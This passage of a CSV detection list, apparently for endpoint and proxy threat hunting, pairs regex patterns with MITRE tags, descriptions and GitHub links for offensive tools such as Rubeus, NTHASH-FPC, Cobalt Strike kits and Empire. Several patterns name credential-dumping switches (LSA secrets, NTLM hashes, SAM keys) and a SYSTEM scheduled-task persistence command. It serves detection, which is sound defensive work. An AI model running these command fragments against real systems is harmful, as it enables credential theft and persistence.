"keyword","metadata_keyword_regex","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at" "* - Bypassing UAC with SSPI Datagram Contexts*",".{0,1000}\s\-\sBypassing\sUAC\swith\sSSPI\sDatagram\sContexts.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "* - delete: Delete a scheduled task. Requires restarting the *",".{0,1000}\s\-\sdelete\:\sDelete\sa\sscheduled\stask\.\sRequires\srestarting\sthe\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. 
- BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#contentstrings","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "* Execute command elevated through Run Dialog*",".{0,1000}\s\sExecute\scommand\selevated\sthrough\sRun\sDialog.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "* Execute command elevated through task manager*",".{0,1000}\s\sExecute\scommand\selevated\sthrough\stask\smanager.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "* --LocalGMEnum --Host *",".{0,1000}\s\s\-\-LocalGMEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "* - Removed disabled accounts from spraying*",".{0,1000}\s\-\sRemoved\sdisabled\saccounts\sfrom\sspraying.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","#contentstrings","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* - Sensitive Accounts.csv*",".{0,1000}\s\-\sSensitive\sAccounts\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "* - ShadowSpray*",".{0,1000}\s\-\sShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "* $exploit_oneliner*",".{0,1000}\s\$exploit_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "* $FodHelperPath*",".{0,1000}\s\$FodHelperPath.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* $KerbDump*",".{0,1000}\s\$KerbDump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "* $lse_find_opts *",".{0,1000}\s\$lse_find_opts\s.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "* $payload_oneliner *",".{0,1000}\s\$payload_oneliner\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "* * 0x* - HOOK DETECTED*",".{0,1000}\s.{0,1000}\s0x.{0,1000}\s\-\sHOOK\sDETECTED.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* */lsass.o*",".{0,1000}\s.{0,1000}\/lsass\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "* ./sf.py -l 127.0.0.1:5001*",".{0,1000}\s\.\/sf\.py\s\-l\s127\.0\.0\.1\:5001.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT 
Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* ./tor.keyring *",".{0,1000}\s\.\/tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* .\tor.keyring *",".{0,1000}\s\.\\tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* .beacon_keys -*",".{0,1000}\s\.beacon_keys\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan 
- Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "* /.exegol/*",".{0,1000}\s\/\.exegol\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* /altservice:ldap *",".{0,1000}\s\/altservice\:ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /asrepkey*",".{0,1000}\s\/asrepkey.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /changentlm* /user:* /oldhash:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldhash\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /changentlm* /user:* /oldpwd:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /cmdtech:* /cmd:* 
/impuser:*",".{0,1000}\s\/cmdtech\:.{0,1000}\s\/cmd\:.{0,1000}\s\/impuser\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","87","17","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /cmdtech:* /cmd:* /query:*",".{0,1000}\s\/cmdtech\:.{0,1000}\s\/cmd\:.{0,1000}\s\/query\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","87","17","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*",".{0,1000}\s\/create\s\/tn\sNotion\s\/tr\s\\.{0,1000}cmd\.exe.{0,1000}\s\-c\s.{0,1000}\\.{0,1000}\s\/sc\sonlogon\s\/ru\sSystem\\.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "* /createnetonly:*cmd.exe*",".{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /credpassword*",".{0,1000}\s\/credpassword.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /creduser:* /credpassword:*",".{0,1000}\s\/creduser\:.{0,1000}\s\/credpassword\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /decodemk /binary:* /password:*",".{0,1000}\s\/decodemk\s\/binary\:.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /dumpsecret /input:* /system*",".{0,1000}\s\/dumpsecret\s\/input\:.{0,1000}\s\/system.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /dumpsecret /input:defaultpassword*",".{0,1000}\s\/dumpsecret\s\/input\:defaultpassword.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /dumpsecret /input:dpapi_system /offline*",".{0,1000}\s\/dumpsecret\s\/input\:dpapi_system\s\/offline.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /gethmac /mode:hashid /input:* /key:*",".{0,1000}\s\/gethmac\s\/mode\:hashid\s\/input\:.{0,1000}\s\/key\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /getlsasecret /input:*",".{0,1000}\s\/getlsasecret\s\/input\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /getntlmhash /password:*",".{0,1000}\s\/getntlmhash\s\/password\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - 
T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /getntlmhash | wtee *.ntlm*",".{0,1000}\s\/getntlmhash\s\|\swtee\s.{0,1000}\.ntlm.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /getsamkey /offline*",".{0,1000}\s\/getsamkey\s\/offline.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /impersonateuser:* /msdsspn:* /ptt*",".{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /ldap * /printcmd*",".{0,1000}\s\/ldap\s.{0,1000}\s\/printcmd.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /ldapfilter:'admincount=1'*",".{0,1000}\s\/ldapfilter\:\'admincount\=1\'.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /modules:* /target:* /linkedsql:*",".{0,1000}\s\/modules\:.{0,1000}\s\/target\:.{0,1000}\s\/linkedsql\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","87","17","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /NAME:* /KILL*",".{0,1000}\s\/NAME\:.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 